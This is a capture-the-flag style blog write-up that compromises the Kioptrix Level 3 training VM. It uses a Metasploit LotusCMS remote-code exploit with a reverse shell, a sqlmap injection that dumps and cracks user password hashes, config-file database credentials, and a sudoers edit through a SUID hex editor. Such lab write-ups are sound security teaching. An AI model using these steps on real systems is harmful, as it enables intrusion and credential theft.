Pentest lab - Kioptrix Level 3 - Core dump overflow

Next in the Kioptrix series is level 3.

Important

With the VM there is a README.txt file that says you should update your hosts file with the VM’s IP and hostname, which is kioptrix3.com. I initially ignored it and on the gallery page, all I could see were some broken images and links that didn’t work. I went back and added the entry to my /etc/hosts file, and everything worked fine afterwards.

Start by checking out what’s being exposed with Nmap:

nmap -A -p1-65535 192.168.127.128

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-20 23:56 EEST
Nmap scan report for 192.168.127.128
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:07:4F:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s take a look at what’s hosted on the web server. It appears to be a site with a blog page, a gallery and what appears to be an admin login page:

I tried running a sqlmap scan against it, with no success. Next, I thought maybe there might be something about the LotusCMS that powers up the site. It turns out there’s a remote execution exploit available in Metasploit:

LotusCMS 3.0 eval() Remote Command Execution

This module exploits a vulnerability found in Lotus CMS 3.0’s Router() function. This is done by embedding PHP code in the ‘page’ parameter, which will be passed to a eval call, therefore allowing remote code execution. The module can either automatically pick up a ‘page’ parameter from the default page, or manually specify one in the URI option. To use the automatic method, please supply the URI with just a directory path, for example: “/lcms/”. To manually configure one, you may do: “/lcms/somepath/index.php?page=index”

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.127.128
RHOST => 192.168.127.128
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.128:40623) at 2014-06-22 00:37:23 +0300
whoami

www-data

So we have a shell. I could not find a local privilege escalation exploit right away, so I instead started exploring the system.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting, so I looked inside:

cd gallery
ls -l
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

So, there’s all the source code for the gallery. I checked the files that looked interesting until I came upon a hit on the gconfig.php file, which contains the sort of information we need:

/*
  A sample Gallarific configuration file. You should edit
  the installer details below and save this file as gconfig.php
  Do not modify anything else if you don't know what it is.
*/

  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

  $GLOBALS["gallarific_mysql_server"] = "localhost";
  $GLOBALS["gallarific_mysql_database"] = "gallery";
  $GLOBALS["gallarific_mysql_username"] = "root";
  $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I tried SSHing to the box with these credentials and also elevating privileges with su, but that would have been too easy. So more digging in the Php source code. The gfunctions.php file contains a plethora of information, among which there are some table and column names. There might be more information in the Php files but I didn’t have the patience to go through all of them.

Back at the gallery, we can see some sorting options:

sort

Changing the sort filter to photo id makes the URL look like this:

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

And if I replace the id=1 part with id=‘, the site spits back a SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ order by parentid,sort,name’ at line 1Could not select category

Now that I know SQLi is possible, it’s time to fire sqlmap again!

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbms=MySQL --level=5 --risk=3 --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+

It was a bit overkill to dump so much information, but I only show here the important bits. To crack the hashes, I used the http://www.hashkiller.co.uk/ site:

dreg’s password: Mast3r

loneferret’s password: starwars

Thankfully, these credentials work for SSH login, so I could get rid of the Metasploit shell which kept throwing EOF errors if I didn’t interact with it for a while.

ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.127.128)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ 

In the home directory there’s a CompanyPolicy.README file with the following:

 Hello new employee,
 It is company policy here to use our newly installed software for editing, creating and viewing files.
 Please use the command 'sudo ht'.
 Failure to do so will result in you immediate termination.

 DG
 CEO

So, let’s see what this ht program is all about:

loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht

Looks like a SUID binary! And it seems it’s a hex editor that we can use to view and edit any file on the system!

Ok, I could crack the root password, but there’s an easier way, by modifing the /etc/sudoers file. First, I had to look up some information about the ht editor. You need to use the F (function) keys for this one. With F6, I could change the mode to text, making it look less horrible. The easiest way I found to go about it was to open the /etc/sudoers file again, after selecting the text mode. Then I added /bin/bas to loneferret’s entry:

sudo bash

Now save the file and type sudo bash to get the long waited for root shell. In the /root/ directory there’s also a Congrats.txt file:

root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

And this was Kioptrix level 3, with another interesting twist.

Today is the tomorrow you worried about yesterday.

Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 3

Comments